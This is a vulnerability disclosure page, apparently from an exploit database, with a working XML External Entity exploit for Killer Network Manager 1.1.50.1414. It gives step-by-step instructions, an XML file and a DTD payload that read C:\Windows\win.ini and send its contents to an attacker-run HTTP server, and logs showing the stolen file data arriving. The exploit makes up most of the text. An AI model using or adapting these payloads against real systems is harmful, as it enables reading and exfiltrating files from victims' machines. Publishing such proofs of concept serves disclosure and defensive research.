Killer Network Manager 1.1.50.1414 - XML External Entity Injection

2019.11.17
fr ZwX (FR) fr
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#Exploit Title: Killer Network Manager 1.1.50.1414 - XML External Entity Injection #Exploit Author : ZwX #Exploit Date: 2019-11-16 #Vendor Homepage : https://support.killernetworking.com/ #Link Software : https://support.killernetworking.com/download/killer-network-manager-suite/ #Tested on OS: Windows 7 [+] Exploit : (PoC) =================== 1) python -m SimpleHTTPServer 8000 2) Create file (.xml) 3) Create file Payload.dtd 4) Open the software Killer Network Manager 5) Click [?] A window opens 6) Drag the file (.xml) into the window 7) External Entity Injection Successful [+] XXE.html : ============== <?xml version="1.0"?> <!DOCTYPE test [ <!ENTITY % file SYSTEM "C:\Windows\win.ini"> <!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd"> %dtd;]> <pwn>&send;</pwn> [+] Payload.dtd : ================= <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>"> %all; [+] Result Exploitation : ========================= C:\>python -m SimpleHTTPServer 8000 Serving HTTP on 0.0.0.0 port 8000 ... ZwX-PC - - [16/Nov/2019 09:17:03] "GET /payload.dtd HTTP/1.1" 200 - ZwX-PC - - [16/Nov/2019 09:17:03] "GET /?;%20for%2016-bit%20app%20support[font s][extensions][mci%20extensions][files][Mail]MAPI=1[MCI%20Extensions.BAK]3g2=MPE GVideo3gp=MPEGVideo3gp2=MPEGVideo3gpp=MPEGVideoaac=MPEGVideoadt=MPEGVideoadts=MP EGVideom2t=MPEGVideom2ts=MPEGVideom2v=MPEGVideom4a=MPEGVideom4v=MPEGVideomod=MPE GVideomov=MPEGVideomp4=MPEGVideomp4v=MPEGVideomts=MPEGVideots=MPEGVideotts=MPEGV ideo[MCTools]ctl=24224[Zip-n-Go]ctl=24224NU=1Version=4.9ID=10518 HTTP/1.1" 301 - ZwX-PC - - [16/Nov/2019 09:17:03] "GET /?;%20for%2016-bit%20app%20support[font s][extensions][mci%20extensions][files][Mail]MAPI=1[MCI%20Extensions.BAK]3g2=MPE GVideo3gp=MPEGVideo3gp2=MPEGVideo3gpp=MPEGVideoaac=MPEGVideoadt=MPEGVideoadts=MP EGVideom2t=MPEGVideom2ts=MPEGVideom2v=MPEGVideom4a=MPEGVideom4v=MPEGVideomod=MPE GVideomov=MPEGVideomp4=MPEGVideomp4v=MPEGVideomts=MPEGVideots=MPEGVideotts=MPEGV ideo[MCTools]ctl=24224[Zip-n-Go]ctl=24224NU=1Version=4.9ID=10518/ HTTP/1.1" 200 -


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top